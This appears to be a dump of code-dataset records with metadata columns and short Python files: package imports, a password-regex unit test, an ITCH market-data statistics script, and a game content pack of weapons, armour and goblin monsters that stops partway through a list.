hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
04edd92c5c5a0510a8898fbb7c3ed86c68328173 | 108 | py | Python | flutile/__init__.py | flu-crew/flutile | 207a13772b2944f1118b608a93a586930000a6f7 | [
"MIT"
] | 3 | 2021-01-16T02:54:23.000Z | 2021-08-31T16:36:20.000Z | flutile/__init__.py | flu-crew/flutile | 207a13772b2944f1118b608a93a586930000a6f7 | [
"MIT"
] | 3 | 2020-12-02T16:35:33.000Z | 2020-12-07T20:13:46.000Z | flutile/__init__.py | flu-crew/flutile | 207a13772b2944f1118b608a93a586930000a6f7 | [
"MIT"
] | null | null | null | from flutile.functions import aadiff_table, represent
from flutile.motifs import get_ha_subtype_nterm_motif
| 36 | 53 | 0.888889 | 16 | 108 | 5.6875 | 0.8125 | 0.241758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 108 | 2 | 54 | 54 | 0.919192 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b6bf159c13082ec171d0385ccd7d42e5006e1b78 | 229 | py | Python | tests/pyregex/test_password_validation.py | JASTYN/pythonmaster | 46638ab09d28b65ce5431cd0759fe6df272fb85d | [
"Apache-2.0",
"MIT"
] | 3 | 2017-05-02T10:28:13.000Z | 2019-02-06T09:10:11.000Z | tests/pyregex/test_password_validation.py | JASTYN/pythonmaster | 46638ab09d28b65ce5431cd0759fe6df272fb85d | [
"Apache-2.0",
"MIT"
] | 2 | 2017-06-21T20:39:14.000Z | 2020-02-25T10:28:57.000Z | tests/pyregex/test_password_validation.py | JASTYN/pythonmaster | 46638ab09d28b65ce5431cd0759fe6df272fb85d | [
"Apache-2.0",
"MIT"
] | 2 | 2016-07-29T04:35:22.000Z | 2017-01-18T17:05:36.000Z | import unittest
from pyregex.password_validation import password_validation
class PassTests(unittest.TestCase):
def test_1(self):
self.assertEqual("ABd1234@1", password_validation("ABd1234@1,a F1#,2w3E*,2We3345"))
| 25.444444 | 91 | 0.768559 | 29 | 229 | 5.931034 | 0.655172 | 0.313953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.094527 | 0.122271 | 229 | 8 | 92 | 28.625 | 0.761194 | 0 | 0 | 0 | 0 | 0 | 0.165939 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0.6 | 0.4 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
b6cebc3bf604b2dca7b8061e0a152fc1d49ba1d7 | 35 | py | Python | archived_projects_(dead)/declare_pyside/qmlside/hot_loader/__init__.py | likianta/declare-qtquick | 93c2ce49d841ccdeb0272085c5f731139927f0d7 | [
"MIT"
] | 3 | 2021-11-02T03:45:27.000Z | 2022-03-27T05:33:36.000Z | declare_pyside/qmlside/hot_loader/__init__.py | Likianta/pyml | b0005b36aa94958a7d3e306a9df65fea46669d18 | [
"MIT"
] | null | null | null | declare_pyside/qmlside/hot_loader/__init__.py | Likianta/pyml | b0005b36aa94958a7d3e306a9df65fea46669d18 | [
"MIT"
] | null | null | null | from .hot_loader import hot_loader
| 17.5 | 34 | 0.857143 | 6 | 35 | 4.666667 | 0.666667 | 0.642857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b6fb41548c7f10ee3286a733e88db94492d59541 | 6,216 | py | Python | examples/statistics.py | alexanu/prickle | e76f4c9d7afaa65a6d0470f649fbf9edbc2bc500 | [
"MIT"
] | 27 | 2018-05-16T09:28:56.000Z | 2022-02-28T02:00:33.000Z | examples/statistics.py | alexanu/prickle | e76f4c9d7afaa65a6d0470f649fbf9edbc2bc500 | [
"MIT"
] | 5 | 2018-06-06T19:38:07.000Z | 2019-10-23T16:10:31.000Z | examples/statistics.py | alexanu/prickle | e76f4c9d7afaa65a6d0470f649fbf9edbc2bc500 | [
"MIT"
] | 16 | 2018-06-07T15:51:22.000Z | 2021-11-23T10:53:57.000Z | from prickle import nodups, find_trades
import pandas as pd
import numpy as np
import os
import time
root = '/Volumes/datasets/ITCH/'
dates = [date for date in os.listdir('{}/csv/'.format(root)) if date != '.DS_Store']
names = [name.lstrip(' ') for name in pd.read_csv('{}/SP500.txt'.format(root))['Symbol']]
# message_counts.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
counts = pd.value_counts(messages['type']).sort_index()
row = [date, name] + list(counts)
output.append(row)
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'A', 'C', 'D', 'E', 'F', 'U', 'X'])
df.to_csv('/Volumes/datasets/ITCH/stats/message_counts.txt')
# message_shares.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
for label in ['A', 'C', 'D', 'E', 'F', 'U', 'X']:
shares = np.abs(messages[messages['type'] == label]['shares'])
cnts, bins = np.histogram(shares, np.arange(0, 2025, 25))
output.append([date, name, label] + list(cnts))
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'type'] + list(np.arange(0, 2000, 25)))
df.to_csv('/Volumes/datasets/ITCH/stats/message_shares.txt')
# message_times.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
for label in ['A', 'C', 'D', 'E', 'F', 'U', 'X']:
times = messages[messages['type'] == label]['time']
cnts, bins = np.histogram(times, np.arange(34200, 57900, 300))
output.append([date, name, label] + list(cnts))
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'type'] + list(np.arange(34200, 57600, 300)))
df.to_csv('/Volumes/datasets/ITCH/stats/message_times.txt')
# message_nano.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
books = pd.read_csv('{}/csv/{}/books/books_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
books['time'] = books['sec'] + books['nano'] / 10 ** 9
books = books[(books['time'] > 34200) & (books['time'] < 57600)]
books, messages = nodups(books, messages)
for label in ['A', 'C', 'D', 'E', 'F', 'U', 'X']:
nanos = messages[messages['type'] == label]['nano']
cnts, bins = np.histogram(nanos, bins=np.arange(0, 10 ** 9 + 2 * 10 ** 7, 2 * 10 ** 7))
output.append([date, name, label] + list(cnts))
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.DataFrame(output, columns=['date', 'name', 'type'] + list(np.arange(0, 10 ** 9, 2 * 10 ** 7)))
df.to_csv('/Volumes/datasets/ITCH/stats/message_nano.txt')
# trades.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
messages = pd.read_csv('{}/csv/{}/messages/messages_{}.txt'.format(root, date, name))
messages['time'] = messages['sec'] + messages['nano'] / 10 ** 9
messages = messages[(messages['time'] > 34200) & (messages['time'] < 57600)]
trades = find_trades(messages)
trades['date'] = date
trades['name'] = name
output.append(trades)
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.concat(output)
df.to_csv('/Volumes/datasets/ITCH/stats/trades.txt')
# hidden.txt
output = []
for name in sorted(names):
for date in dates[:-1]:
start = time.time()
hidden = pd.read_csv('{}/csv/{}/trades/trades_{}.txt'.format(root, date, name))
hidden['time'] = hidden['sec'] + hidden['nano'] / 10 ** 9
hidden = hidden[(hidden['time'] > 34200) & (hidden['time'] < 57000)]
trades = find_trades(hidden)
trades['date'] = date
trades['name'] = name
output.append(trades)
stop = time.time()
print('Processing data for {}, {} (time={})'.format(name, date, stop - start))
df = pd.concat(output)
df.to_csv('/Volumes/datasets/ITCH/stats/hidden_trades.txt')
| 48.944882 | 102 | 0.578024 | 804 | 6,216 | 4.416667 | 0.113184 | 0.081104 | 0.027879 | 0.033793 | 0.773303 | 0.767389 | 0.767389 | 0.765418 | 0.716136 | 0.716136 | 0 | 0.040587 | 0.211229 | 6,216 | 126 | 103 | 49.333333 | 0.683663 | 0.015122 | 0 | 0.716814 | 0 | 0 | 0.190352 | 0.098937 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.044248 | 0 | 0.044248 | 0.053097 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
f3d02e16c902233caa47190ed03f7585687b37aa | 37 | py | Python | charis/parallel/__init__.py | thaynecurrie/charis-dep | 238397bb3ec18edba6e59c7203a623709ff4b50d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | charis/parallel/__init__.py | thaynecurrie/charis-dep | 238397bb3ec18edba6e59c7203a623709ff4b50d | [
"BSD-2-Clause-FreeBSD"
] | 14 | 2018-01-23T14:46:39.000Z | 2021-05-24T17:29:52.000Z | charis/parallel/__init__.py | thaynecurrie/charis-dep | 238397bb3ec18edba6e59c7203a623709ff4b50d | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2017-12-28T10:10:32.000Z | 2021-03-23T20:36:55.000Z | from par_utils import Task, Consumer
| 18.5 | 36 | 0.837838 | 6 | 37 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 37 | 1 | 37 | 37 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f3dd583293ff15a754a6b761f94843fbe31fa40c | 32 | py | Python | Spectroscopy/atomiclines.py | guangtunbenzhu/BGT-Cosmology | 2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee | [
"MIT"
] | 1 | 2018-06-17T14:42:52.000Z | 2018-06-17T14:42:52.000Z | Spectroscopy/atomiclines.py | guangtunbenzhu/BGT-Cosmology | 2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee | [
"MIT"
] | null | null | null | Spectroscopy/atomiclines.py | guangtunbenzhu/BGT-Cosmology | 2dbedfb6ead3ecd2f43a2716cfd388a5a65979ee | [
"MIT"
] | null | null | null | from .lines import AtomicLines
| 10.666667 | 30 | 0.8125 | 4 | 32 | 6.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15625 | 32 | 2 | 31 | 16 | 0.962963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
f3f5cd432178c685d42736e322b3d6e995451dd1 | 42 | py | Python | ImageNetLT/datasets/dataset.py | FPNAS/ResLT | 1610b6b455cecd720c37d1da5208111b25baa257 | [
"MIT"
] | 13 | 2021-01-26T08:17:26.000Z | 2021-07-07T08:26:53.000Z | ImageNetLT/datasets/dataset.py | FPNAS/ResLT | 1610b6b455cecd720c37d1da5208111b25baa257 | [
"MIT"
] | 4 | 2021-01-28T15:21:55.000Z | 2021-07-16T13:56:57.000Z | ImageNetLT/datasets/dataset.py | FPNAS/ResLT | 1610b6b455cecd720c37d1da5208111b25baa257 | [
"MIT"
] | 1 | 2022-01-01T03:17:57.000Z | 2022-01-01T03:17:57.000Z | from datasets.imagenet import ImageNet
| 10.5 | 39 | 0.809524 | 5 | 42 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 42 | 3 | 40 | 14 | 0.971429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6d1d6f4f11009c73cf75639ac5ce66e021c59c8f | 22 | py | Python | Books/GodOfPython/P00_OriginalSource/ch18/mypkg/build/lib/smtpkg7/camera/__init__.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | 2 | 2020-12-05T07:42:55.000Z | 2021-01-06T23:23:18.000Z | Books/GodOfPython/P00_OriginalSource/ch18/mypkg/smtpkg7/camera/__init__.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | Books/GodOfPython/P00_OriginalSource/ch18/mypkg/smtpkg7/camera/__init__.py | Tim232/Python-Things | 05f0f373a4cf298e70d9668c88a6e3a9d1cd8146 | [
"MIT"
] | null | null | null | from . import camera
| 7.333333 | 20 | 0.727273 | 3 | 22 | 5.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 2 | 21 | 11 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6d258bd4e7f61d64c5e98a9987ed17f2fffbfdfb | 10,965 | py | Python | Content/basic_pack.py | Josephkhland/MUFA-MMO | 59a9b5452e7882c82fe8e4a7574cd768c52ea1e9 | [
"MIT"
] | 3 | 2020-05-03T02:09:36.000Z | 2021-11-11T19:24:16.000Z | Content/basic_pack.py | Josephkhland/MUFA-MMO | 59a9b5452e7882c82fe8e4a7574cd768c52ea1e9 | [
"MIT"
] | 1 | 2020-10-24T21:13:50.000Z | 2020-10-26T11:54:25.000Z | Content/basic_pack.py | Josephkhland/MUFA-MMO | 59a9b5452e7882c82fe8e4a7574cd768c52ea1e9 | [
"MIT"
] | null | null | null | import mufa_world as mw
import mufadb as db
def basic_weapons():
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Sword",
item_type = 3,
precision_scale = 90,
damage_amp_scale = 5,
damage_per_amp = 2,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Spear",
item_type = 4,
precision_scale = 70,
damage_amp_scale = 5,
damage_per_amp = 2,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Club",
item_type = 5,
precision_scale = 50,
damage_amp_scale = 50,
damage_per_amp = 5,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Basic Bow",
item_type = 6,
precision_scale = 70,
damage_amp_scale = 50,
damage_per_amp = 2,
damage_base = 3,
drop_chance = 10).save()
db.Weapon(item_id = mw.generateItemID(),
name = "Goblin Claws",
item_type = 3,
precision_scale = 90,
damage_amp_scale = 10,
damage_per_amp = 1,
damage_base = 3).save()
print("Basic Weapons Pack Installed Successfully")
def basic_armor():
#Cultist Armor Set
db.ArmorSet(name = "Cultist",
two_items_set_bonus = [1,0,0,0],
full_set_bonus = [2,0,0,0]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Cultist's Hood",
armor_set = db.ArmorSet.objects.get(name = "Cultist").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Cultist's Robes",
armor_set = db.ArmorSet.objects.get(name = "Cultist").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Cultist's Boots",
armor_set = db.ArmorSet.objects.get(name = "Cultist").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
#Rook Armor Set
db.ArmorSet(name = "Rook",
two_items_set_bonus = [0,1,0,0],
full_set_bonus = [0,2,0,0]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Rook's Helmet",
armor_set = db.ArmorSet.objects.get(name = "Rook").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Rook's Hide",
armor_set = db.ArmorSet.objects.get(name = "Rook").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Rook's Boots",
armor_set = db.ArmorSet.objects.get(name = "Rook").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
#Acrobat Armor Set
db.ArmorSet(name = "Acrobat",
two_items_set_bonus = [0,0,1,0],
full_set_bonus = [0,0,2,0]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Acrobat's Cap",
armor_set = db.ArmorSet.objects.get(name = "Acrobat").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Acrobat's Shirt",
armor_set = db.ArmorSet.objects.get(name = "Acrobat").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Acrobat's Shoes",
armor_set = db.ArmorSet.objects.get(name = "Acrobat").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
#Brute Armor Set
db.ArmorSet(name = "Brute",
two_items_set_bonus = [0,0,0,1],
full_set_bonus = [0,0,0,2]).save()
db.Armor(item_id = mw.generateItemID(),
name = "Brute's Helmet",
armor_set = db.ArmorSet.objects.get(name = "Brute").to_dbref(),
item_type = 0,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Brute's Armour",
armor_set = db.ArmorSet.objects.get(name = "Brute").to_dbref(),
item_type = 1,
evasion_chance_reduction = 5,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
db.Armor(item_id = mw.generateItemID(),
name = "Brute's Boots",
armor_set = db.ArmorSet.objects.get(name = "Brute").to_dbref(),
item_type = 2,
evasion_chance_reduction = 0,
physical_damage_reduction_f = 0,
physical_damage_reduction_p = 2,
drop_chance = 10).save()
print("Basic Armour Pack Installed Successfully")
def basic_monsters():
null_obj = db.Item.objects.get(name = "null_object").to_dbref()
weapon_slash = db.Weapon.objects.get(name = "Goblin Claws").to_dbref()
helmet = db.Armor.objects.get(name = "Rook's Helmet").to_dbref()
chestpiece = db.Armor.objects.get(name = "Rook's Hide").to_dbref()
boots = db.Armor.objects.get(name = "Rook's Boots").to_dbref()
n_char = db.character(name = "Goblin Rook",
willpower = 1,
vitality = 2,
agility = 1,
strength = 1,
karma = 1,
current_health = 10,
current_sanity = 10,
armor_equiped = [helmet,chestpiece,boots],
weapons_equiped = [weapon_slash,null_obj,null_obj,null_obj],
instance_stack = []
)
db.MonsterEntry(name = n_char.name, character_stats=n_char).save()
helmet = db.Armor.objects.get(name = "Acrobat's Cap").to_dbref()
chestpiece = db.Armor.objects.get(name = "Acrobat's Shirt").to_dbref()
boots = db.Armor.objects.get(name = "Acrobat's Shoes").to_dbref()
n_char = db.character(name = "Goblin Scout",
willpower = 1,
vitality = 1,
agility = 2,
strength = 1,
karma = 1,
current_health = 10,
current_sanity = 10,
armor_equiped = [helmet,chestpiece,boots],
weapons_equiped = [weapon_slash,null_obj,null_obj,null_obj],
instance_stack = []
)
db.MonsterEntry(name = n_char.name, character_stats=n_char).save()
helmet = db.Armor.objects.get(name = "Brute's Helmet").to_dbref()
chestpiece = db.Armor.objects.get(name = "Brute's Armour").to_dbref()
boots = db.Armor.objects.get(name = "Brute's Boots").to_dbref()
n_char = db.character(name = "Goblin Brute",
willpower = 1,
vitality = 1,
agility = 1,
strength = 2,
karma = 1,
current_health = 10,
current_sanity = 10,
armor_equiped = [helmet,chestpiece,boots],
weapons_equiped = [weapon_slash,null_obj,null_obj,null_obj],
instance_stack = []
)
db.MonsterEntry(name = n_char.name, character_stats=n_char).save()
print("Basic Monsters Pack Installed Successfully")
def basic_dungeon():
db.Tags(
name = "Decorators",
collection = ["barrel", "cupboard", "waste", "pot", "corpses", "torches",
"bones","pit","mold","graffiti","cage","kennels","debris"]
).save()
db.Tags(
name = "Deadends",
collection = ["wall", "bottomless pit", "boulder" , "wooden obstacle",
"barricade"]
).save()
db.Tags(
name = "Pathways",
collection = ["tunnel","slope","stairs","stream","waterfall","bridge",
"shipwreck", "door", "doorway", "curtain", "corridor"]
).save()
db.Tags(
name = "Symbols",
collection = ["circle", "square", "triangle", "stickman", "eye", "sun",
"moon", "hexagon", "skull", "oval", "leaf", "bear", "wolf", "eagle",
"fish", "sword", "bow", "flame", "star" , "deer", "arrow", "spiral",
